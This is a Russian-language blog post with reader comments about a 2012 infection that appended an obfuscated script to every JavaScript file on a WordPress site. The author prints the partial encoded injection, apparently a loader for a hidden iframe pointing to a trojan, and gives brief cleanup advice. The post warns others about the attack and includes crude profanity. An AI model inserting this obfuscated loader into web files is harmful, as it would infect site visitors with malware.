Вирусы в WordPress во всех файлах JS!

Сегодня зайдя на наш сайт мы офигели — антивирус регистрировал трояна интергрированного во все фалы JavaScript внизу! На дату: 11.04.2012 18:10 — видимо приурочено было ко дню космонавтики — с чем вас и поздравляем! Лечится так: или заливаем бакап в на ваш сайт (включая все поддомены) в путём переписываниявсех файлов *.js! Ниже я привожу ту гадость которая была интегрирована в файл ввиде зашифрованного iframe со ссылкой на сам вирус! У многих пользователей на сайтах сейчас наблюдается всё тоже самое — если набрать первые строчки зашифрованной ссылки в том же Google — то за вчера и сегодня полегло до-фига сайтов, вот её удалённый исходник! (Вот ссуки!) Но мы всё умело починили за 10 минут! И так вот он iframe cо ссылкой на сам исходный вирус Trojan JS/Kryptik.LP а через него уже (по злоумышленники должны были грузить сам вирус):

c=3-1;i=c-2;if(window.document)if(parseInt(`0″+»1″+»2″+»3″)===83)try{Boolean().prototype.q}catch(egewgsd){f=[‘0i63i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i69i17i76i14i12i6i58i81i79i63i70i60i80i76i66i65i6i62i74i71i69i5i76i70i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-… ВОТ УРОДЫ БЛЯ!

Мы уверены на 85%: Что облажались не мы и не вордпресс и не модули и плагины — а провайдер мастерхост, потому-что в файлы находящиеся не в каталоге wordpress’a были тоже дописаны вредоносные коды, а это говорит о том, что это не маленькая дырочка wordpress — а большая дыра хостинг-провайдера! Или же у нас спистели пароли, что тоже может быть или нас ломанули по-полной программе. От имени сайта — приносим свои изменения. 😉

3 thoughts on “Вирусы в WordPress во всех файлах JS!

  1. Надо сказать — такой подобный взлом был несколько лет назад с добавлением в низ к любому вашему файлу html просто в виде <iframe src=… А теперь, по-аналогии в js! и уже зашифрованный! 😈 😈 😈

  2. ОГО я тока ща заметил что у меня такой код на всех ява скриптах стоит, сегодня ругался антивирус на квери, её почистил а ща захожу и смотрю что на всех яав стоит один и тодже код

    1. Лечите — реальный вирус! А прекинте сколько людей будет от вас заражаться. И что итог может быть такой в поисковике: Этот сайт может угрожать безопасности вашего компьютера. Уходим отсюда. И выпадет из поиска и SEO.

Comments are closed.